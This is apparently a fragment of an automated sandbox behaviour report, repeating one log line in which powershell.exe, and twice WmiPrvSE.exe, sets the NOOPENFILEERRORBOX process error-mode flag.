                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
